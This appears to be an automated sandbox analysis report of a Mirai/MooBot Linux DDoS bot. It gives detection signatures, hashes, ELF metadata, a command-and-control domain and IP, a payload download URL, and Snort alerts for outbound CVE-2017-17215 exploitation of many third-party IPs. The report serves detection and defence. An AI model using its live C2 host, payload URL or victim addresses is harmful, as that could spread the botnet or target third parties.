                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: Yara matchFile source: bolonetwork.x86.elf, type: SAMPLE
                  Source: Yara matchFile source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTR
                  Source: Yara matchFile source: bolonetwork.x86.elf, type: SAMPLE
                  Source: Yara matchFile source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Scripting
                  Path Interception1
                  File Deletion
                  1
                  OS Credential Dumping
                  System Service DiscoveryRemote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1470607 Sample: bolonetwork.x86.elf Startdate: 10/07/2024 Architecture: LINUX Score: 100 20 botvectors.mineheaven.org 2->20 22 197.186.243.50 airtel-tz-asTZ Tanzania United Republic of 2->22 24 100 other IPs or domains 2->24 26 Snort IDS alert for network traffic 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 7 other signatures 2->32 8 dash rm bolonetwork.x86.elf 2->8         started        10 dash rm 2->10         started        signatures3 process4 process5 12 bolonetwork.x86.elf 8->12         started        process6 14 bolonetwork.x86.elf 12->14         started        16 bolonetwork.x86.elf 12->16         started        18 bolonetwork.x86.elf 12->18         started       
                  SourceDetectionScannerLabelLink
                  bolonetwork.x86.elf61%ReversingLabsLinux.Trojan.Mirai
                  bolonetwork.x86.elf100%AviraEXP/ELF.Mirai.Z.A
                  bolonetwork.x86.elf100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.24
                  truefalse
                    unknown
                    botvectors.mineheaven.org
                    51.79.141.54
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/soap/encoding/bolonetwork.x86.elffalse
                      • URL Reputation: safe
                      unknown
                      http://51.79.141.54/bolonetwork.arm7$bolonetwork.x86.elffalse
                        unknown
                        http://schemas.xmlsoap.org/soap/envelope/bolonetwork.x86.elffalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        197.234.120.168
                        unknownNamibia
                        33763Paratus-TelecomNAfalse
                        157.182.19.59
                        unknownUnited States
                        12118WVUUSfalse
                        197.67.168.151
                        unknownSouth Africa
                        16637MTNNS-ASZAfalse
                        197.123.124.70
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        131.16.127.155
                        unknownUnited States
                        721DNIC-ASBLK-00721-00726USfalse
                        157.198.184.12
                        unknownUnited States
                        4704SANNETRakutenMobileIncJPfalse
                        41.97.63.115
                        unknownAlgeria
                        36947ALGTEL-ASDZfalse
                        156.20.132.17
                        unknownUnited States
                        29975VODACOM-ZAfalse
                        197.224.179.5
                        unknownMauritius
                        23889MauritiusTelecomMUfalse
                        197.247.118.62
                        unknownMorocco
                        36925ASMediMAfalse
                        54.212.28.245
                        unknownUnited States
                        16509AMAZON-02USfalse
                        41.192.59.108
                        unknownSouth Africa
                        29975VODACOM-ZAfalse
                        146.1.181.241
                        unknownUnited States
                        3376MCI-ASNUSfalse
                        41.248.100.195
                        unknownMorocco
                        36903MT-MPLSMAfalse
                        197.148.170.237
                        unknownMadagascar
                        37303AIRTELMADAMGfalse
                        197.226.227.81
                        unknownMauritius
                        23889MauritiusTelecomMUfalse
                        157.14.212.92
                        unknownJapan2512TCP-NETTCPIncJPfalse
                        40.18.117.216
                        unknownUnited States
                        4249LILLY-ASUSfalse
                        41.227.233.229
                        unknownTunisia
                        2609TN-BB-ASTunisiaBackBoneASTNfalse
                        89.138.26.120
                        unknownIsrael
                        1680NV-ASNCELLCOMltdILfalse
                        197.87.221.120
                        unknownSouth Africa
                        10474OPTINETZAfalse
                        108.225.203.47
                        unknownUnited States
                        7018ATT-INTERNET4USfalse
                        157.87.196.76
                        unknownUnited States
                        21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                        41.180.235.182
                        unknownSouth Africa
                        36916X-DSL-NET1ZAfalse
                        157.205.3.168
                        unknownJapan17514AICSOtsukaCorpJPfalse
                        197.223.159.164
                        unknownEgypt
                        37069MOBINILEGfalse
                        184.241.83.149
                        unknownUnited States
                        10507SPCSUSfalse
                        41.199.43.148
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        157.50.85.35
                        unknownIndia
                        55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                        64.56.254.204
                        unknownCanada
                        6407PRIMUS-AS6407CAfalse
                        92.252.112.103
                        unknownGermany
                        9145EWETELCloppenburgerStrasse310DEfalse
                        41.244.38.249
                        unknownCameroon
                        37620VIETTEL-CM-ASCMfalse
                        41.153.222.253
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        197.73.207.22
                        unknownSouth Africa
                        16637MTNNS-ASZAfalse
                        157.44.191.52
                        unknownIndia
                        55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                        41.27.15.25
                        unknownSouth Africa
                        29975VODACOM-ZAfalse
                        157.126.150.145
                        unknownUnited States
                        1738OKOBANK-ASEUfalse
                        184.164.217.225
                        unknownUnited States
                        35908VPLSNETUSfalse
                        106.126.233.138
                        unknownChina
                        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                        197.161.195.0
                        unknownEgypt
                        24863LINKdotNET-ASEGfalse
                        66.65.108.187
                        unknownUnited States
                        12271TWC-12271-NYCUSfalse
                        41.41.240.228
                        unknownEgypt
                        8452TE-ASTE-ASEGfalse
                        157.173.215.150
                        unknownUnited Kingdom
                        22192SSHENETUSfalse
                        41.97.63.138
                        unknownAlgeria
                        36947ALGTEL-ASDZfalse
                        41.110.216.184
                        unknownAlgeria
                        36947ALGTEL-ASDZfalse
                        211.228.252.98
                        unknownKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        197.108.193.202
                        unknownSouth Africa
                        37168CELL-CZAfalse
                        182.219.54.80
                        unknownKorea Republic of
                        17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                        1.126.109.60
                        unknownAustralia
                        1221ASN-TELSTRATelstraCorporationLtdAUfalse
                        41.243.103.140
                        unknownCongo The Democratic Republic of The
                        37684ANGANI-ASKEfalse
                        197.4.54.37
                        unknownTunisia
                        5438ATI-TNfalse
                        184.245.82.206
                        unknownUnited States
                        10507SPCSUSfalse
                        63.147.95.208
                        unknownUnited States
                        13994OMU-1USfalse
                        50.123.190.126
                        unknownUnited States
                        5650FRONTIER-FRTRUSfalse
                        197.21.28.75
                        unknownTunisia
                        37693TUNISIANATNfalse
                        159.23.26.106
                        unknownUnited States
                        200544SWISS-DEFENCE-AFCSOCHfalse
                        211.55.129.184
                        unknownKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        157.205.3.145
                        unknownJapan17514AICSOtsukaCorpJPfalse
                        197.210.99.188
                        unknownNigeria
                        29465VCG-ASNGfalse
                        184.229.42.36
                        unknownUnited States
                        10507SPCSUSfalse
                        41.184.166.162
                        unknownNigeria
                        29091IPNXngNGfalse
                        41.6.67.249
                        unknownSouth Africa
                        29975VODACOM-ZAfalse
                        197.132.199.94
                        unknownEgypt
                        24835RAYA-ASEGfalse
                        197.179.206.153
                        unknownKenya
                        33771SAFARICOM-LIMITEDKEfalse
                        41.95.189.166
                        unknownSudan
                        36998SDN-MOBITELSDfalse
                        218.144.238.52
                        unknownKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        184.61.245.139
                        unknownUnited States
                        4181TDS-ASUSfalse
                        211.226.41.144
                        unknownKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        211.88.42.237
                        unknownChina
                        9306CIECC-AS-APChinaInternationalElectronicCommerceCenterfalse
                        197.27.94.145
                        unknownTunisia
                        37492ORANGE-TNfalse
                        157.169.207.245
                        unknownFrance
                        2418FR-ASNBLOCK2FR-MAN-SOPHIA-ANTIPOLISEUfalse
                        197.4.224.51
                        unknownTunisia
                        5438ATI-TNfalse
                        41.65.28.121
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        157.124.216.9
                        unknownFinland
                        1738OKOBANK-ASEUfalse
                        157.183.233.234
                        unknownUnited States
                        12118WVUUSfalse
                        211.55.129.175
                        unknownKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        157.141.117.254
                        unknownUnited States
                        27064DNIC-ASBLK-27032-27159USfalse
                        197.186.243.50
                        unknownTanzania United Republic of
                        37133airtel-tz-asTZfalse
                        70.37.124.87
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        197.202.32.126
                        unknownAlgeria
                        36947ALGTEL-ASDZfalse
                        41.189.163.137
                        unknownGhana
                        30986SCANCOMGHfalse
                        157.230.60.238
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUSfalse
                        197.123.173.55
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        197.240.229.37
                        unknownunknown
                        37705TOPNETTNfalse
                        41.191.33.102
                        unknownunknown
                        36974AFNET-ASCIfalse
                        222.46.68.216
                        unknownChina
                        9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                        95.108.150.28
                        unknownRussian Federation
                        13238YANDEXRUfalse
                        18.232.167.129
                        unknownUnited States
                        14618AMAZON-AESUSfalse
                        197.128.20.88
                        unknownMorocco
                        6713IAM-ASMAfalse
                        67.163.58.176
                        unknownUnited States
                        7922COMCAST-7922USfalse
                        197.179.230.83
                        unknownKenya
                        33771SAFARICOM-LIMITEDKEfalse
                        41.210.115.177
                        unknownunknown
                        29614GHANATEL-ASGHfalse
                        211.0.22.179
                        unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                        197.173.220.120
                        unknownSouth Africa
                        37168CELL-CZAfalse
                        94.252.222.15
                        unknownSyrian Arab Republic
                        29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                        41.152.118.82
                        unknownEgypt
                        36992ETISALAT-MISREGfalse
                        13.80.175.201
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        41.226.143.12
                        unknownTunisia
                        37705TOPNETTNfalse
                        41.28.30.196
                        unknownSouth Africa
                        29975VODACOM-ZAfalse
                        41.115.248.73
                        unknownSouth Africa
                        16637MTNNS-ASZAfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        197.234.120.168arm7.elfGet hashmaliciousMirai, MoobotBrowse
                          197.123.124.70arm.lightGet hashmaliciousUnknownBrowse
                            197.247.118.62bok.arm4-20230316-1120.elfGet hashmaliciousMiraiBrowse
                              41.192.59.108huhu.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                l99tLLKEfY.elfGet hashmaliciousMirai, MoobotBrowse
                                  hPOS8SnH2G.elfGet hashmaliciousMirai, MoobotBrowse
                                    157.198.184.12GH53M1dXgO.elfGet hashmaliciousMirai, MoobotBrowse
                                      41.97.63.115v2awjyMFRV.elfGet hashmaliciousMirai, MoobotBrowse
                                        tybCIRiXjPGet hashmaliciousMiraiBrowse
                                          197.67.168.151hCGaMRj2il.elfGet hashmaliciousMiraiBrowse
                                            bk.arm7.elfGet hashmaliciousMiraiBrowse
                                              pgna1rct3YGet hashmaliciousGafgyt MiraiBrowse
                                                wuyZAnkXB9Get hashmaliciousMiraiBrowse
                                                  197.224.179.5CXLF2p4Ly0.elfGet hashmaliciousMirai, MoobotBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    daisy.ubuntu.combolonetwork.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 162.213.35.25
                                                    94.156.66.188-sora.mpsl-2024-07-10T02_33_28.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    SecuriteInfo.com.Linux.Siggen.9999.10024.9674.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    SecuriteInfo.com.Linux.Siggen.9999.18300.22472.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    SecuriteInfo.com.Linux.Siggen.9999.8981.14186.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.25
                                                    SecuriteInfo.com.Linux.Siggen.9999.12887.3629.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    eNnp0XdtqU.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 162.213.35.25
                                                    arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    arm6-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                                    • 162.213.35.24
                                                    SecuriteInfo.com.ELF.Agent-CPN.21836.5466.elfGet hashmaliciousUnknownBrowse
                                                    • 162.213.35.24
                                                    botvectors.mineheaven.orgbolonetwork.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 51.79.141.54
                                                    bolonetwork.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 51.79.141.54
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    MTNNS-ASZAbolonetwork.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 41.195.174.122
                                                    bolonetwork.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 197.75.245.78
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 105.237.52.51
                                                    95.214.27.186-x86-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                                                    • 197.76.213.111
                                                    95.214.27.186-mips-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                                                    • 41.116.238.203
                                                    95.214.27.186-arm-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                                                    • 41.112.57.239
                                                    3jI8pe3luL.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 197.66.178.247
                                                    FTowJPpHr5.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 197.67.168.120
                                                    CWf1KQWSFg.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 197.75.135.229
                                                    arm4-20240706-0012.elfGet hashmaliciousMiraiBrowse
                                                    • 41.120.246.115
                                                    Paratus-TelecomNAsYgsg1JAC0.elfGet hashmaliciousMiraiBrowse
                                                    • 160.242.69.226
                                                    D8toi0qM9J.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 197.234.120.156
                                                    bot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 197.234.120.187
                                                    zRN6jGaewE.elfGet hashmaliciousUnknownBrowse
                                                    • 160.242.103.148
                                                    8cys6Vklwy.elfGet hashmaliciousUnknownBrowse
                                                    • 160.243.96.122
                                                    sQSqM58mvl.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                    • 160.242.22.203
                                                    0ZL4A1ojq4.elfGet hashmaliciousMiraiBrowse
                                                    • 160.242.103.117
                                                    QvpSy7ZbUh.elfGet hashmaliciousMirai, GafgytBrowse
                                                    • 197.234.66.201
                                                    UN8chkjVtu.elfGet hashmaliciousMiraiBrowse
                                                    • 160.242.5.252
                                                    bot.arm-20240324-1846.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 197.234.120.166
                                                    WVUUSFTowJPpHr5.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 157.182.20.50
                                                    hmips-20240623-1326.elfGet hashmaliciousMiraiBrowse
                                                    • 157.183.68.7
                                                    arm5-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                    • 157.182.68.11
                                                    arm4-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                    • 157.182.219.141
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 157.183.23.170
                                                    6vokwEQb7K.elfGet hashmaliciousMiraiBrowse
                                                    • 157.183.23.167
                                                    D2XjA30YmD.elfGet hashmaliciousMiraiBrowse
                                                    • 157.182.19.51
                                                    NRxJduEvLG.elfGet hashmaliciousMiraiBrowse
                                                    • 157.182.219.183
                                                    52N2ePfSI1.elfGet hashmaliciousMiraiBrowse
                                                    • 157.183.23.178
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 157.182.220.26
                                                    No context
                                                    No context
                                                    No created / dropped files found
                                                    File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):5.915442650925604
                                                    TrID:
                                                    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                    File name:bolonetwork.x86.elf
                                                    File size:107'432 bytes
                                                    MD5:808f3ef3bb55ce80b71edfd7e2fd731c
                                                    SHA1:8c6355828eda5701fce4c6c26ddb1b48e2592847
                                                    SHA256:7af0472e07a630366f42e1d56cd22455469230058025e99212589daf22693b0e
                                                    SHA512:6be5c1b1ae5811d1a9af0bf3a0a296606312534bbd2a0019e59f7a34801305135be35ca9bef3301a636423d2c70e402b19cd7ab876de9d8eee1d9baa01501c96
                                                    SSDEEP:3072:YogLpzc7tchhl++HaQqOtKFDW26PgZpiq:YowpzWSrl++HcrPiq
                                                    TLSH:80A36CC4F243D4F6E84601B55177FF329F33E0BA1229EA43D7685D32ACA2551D606BAC
                                                    File Content Preview:.ELF....................d...4...........4. ...(......................Y...Y...............Y...........G..8...........Q.td............................U..S.......oi...h.....+..[]...$.............U......=.1...t..5....$......$.......u........t....h............

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:Intel 80386
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x8048164
                                                    Flags:0x0
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:107032
                                                    Section Header Size:40
                                                    Number of Section Headers:10
                                                    Header String Table Index:9
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                    .textPROGBITS0x80480b00xb00x12bd60x00x6AX0016
                                                    .finiPROGBITS0x805ac860x12c860x170x00x6AX001
                                                    .rodataPROGBITS0x805aca00x12ca00x2d500x00x2A0032
                                                    .ctorsPROGBITS0x805e9f40x159f40xc0x00x3WA004
                                                    .dtorsPROGBITS0x805ea000x15a000x80x00x3WA004
                                                    .dataPROGBITS0x805ea200x15a200x47b80x00x3WA0032
                                                    .bssNOBITS0x80631e00x1a1d80x8a4c0x00x3WA0032
                                                    .shstrtabSTRTAB0x00x1a1d80x3e0x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x80480000x80480000x159f00x159f06.63710x5R E0x1000.init .text .fini .rodata
                                                    LOAD0x159f40x805e9f40x805e9f40x47e40xd2380.37860x6RW 0x1000.ctors .dtors .data .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/10/24-08:26:49.804383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816237215192.168.2.1441.119.151.209
                                                    07/10/24-08:26:25.467612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793837215192.168.2.14157.104.23.224
                                                    07/10/24-08:26:41.356703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431237215192.168.2.1481.33.102.159
                                                    07/10/24-08:27:23.453618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328437215192.168.2.14197.115.5.212
                                                    07/10/24-08:27:19.228026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460637215192.168.2.14197.228.130.161
                                                    07/10/24-08:26:15.865668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759037215192.168.2.14157.71.73.207
                                                    07/10/24-08:27:30.426359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739637215192.168.2.14141.176.164.195
                                                    07/10/24-08:26:34.234047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768237215192.168.2.14197.39.185.227
                                                    07/10/24-08:26:18.027319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437837215192.168.2.14197.30.2.126
                                                    07/10/24-08:27:28.120047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574637215192.168.2.14197.45.130.166
                                                    07/10/24-08:26:59.660546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992837215192.168.2.144.60.183.33
                                                    07/10/24-08:27:11.496514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145637215192.168.2.14197.0.61.183
                                                    07/10/24-08:27:28.054333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053437215192.168.2.14197.185.1.208
                                                    07/10/24-08:27:23.953433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633037215192.168.2.14104.229.94.16
                                                    07/10/24-08:27:23.917570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.14197.251.120.224
                                                    07/10/24-08:26:25.467613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.14195.6.45.58
                                                    07/10/24-08:26:28.637197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076237215192.168.2.14197.212.152.96
                                                    07/10/24-08:26:42.179798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.1441.57.117.150
                                                    07/10/24-08:26:11.604858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930837215192.168.2.1441.207.94.39
                                                    07/10/24-08:26:34.201699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083637215192.168.2.14197.192.39.60
                                                    07/10/24-08:26:14.818070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045237215192.168.2.1441.59.162.160
                                                    07/10/24-08:26:55.325101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642837215192.168.2.1441.169.140.48
                                                    07/10/24-08:27:27.076919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723437215192.168.2.14197.40.47.241
                                                    07/10/24-08:27:19.298148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.14197.36.151.51
                                                    07/10/24-08:27:17.040867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527037215192.168.2.14197.146.19.151
                                                    07/10/24-08:26:34.214709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237637215192.168.2.1441.122.178.44
                                                    07/10/24-08:26:41.485382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825237215192.168.2.14197.225.68.128
                                                    07/10/24-08:26:43.713533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091237215192.168.2.14197.136.2.181
                                                    07/10/24-08:26:47.981367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218037215192.168.2.1441.130.131.118
                                                    07/10/24-08:26:15.796223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026437215192.168.2.14157.50.209.6
                                                    07/10/24-08:27:17.039425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125037215192.168.2.14222.46.68.216
                                                    07/10/24-08:26:11.584226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231237215192.168.2.14197.1.113.95
                                                    07/10/24-08:27:17.084345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596437215192.168.2.1441.113.158.120
                                                    07/10/24-08:26:15.872361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153237215192.168.2.14197.52.221.40
                                                    07/10/24-08:26:15.864839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061437215192.168.2.14157.53.112.70
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661237215192.168.2.1441.234.123.200
                                                    07/10/24-08:26:31.076000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.1441.190.77.207
                                                    07/10/24-08:27:11.512071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766637215192.168.2.14157.198.206.98
                                                    07/10/24-08:27:13.995409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336037215192.168.2.1441.105.112.68
                                                    07/10/24-08:27:02.998271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.14157.229.194.230
                                                    07/10/24-08:27:02.730689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612037215192.168.2.14223.127.16.240
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420837215192.168.2.14197.182.17.105
                                                    07/10/24-08:26:28.782504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278837215192.168.2.14157.79.242.144
                                                    07/10/24-08:27:27.067694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183437215192.168.2.1441.145.56.242
                                                    07/10/24-08:26:22.222070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264037215192.168.2.14197.234.231.24
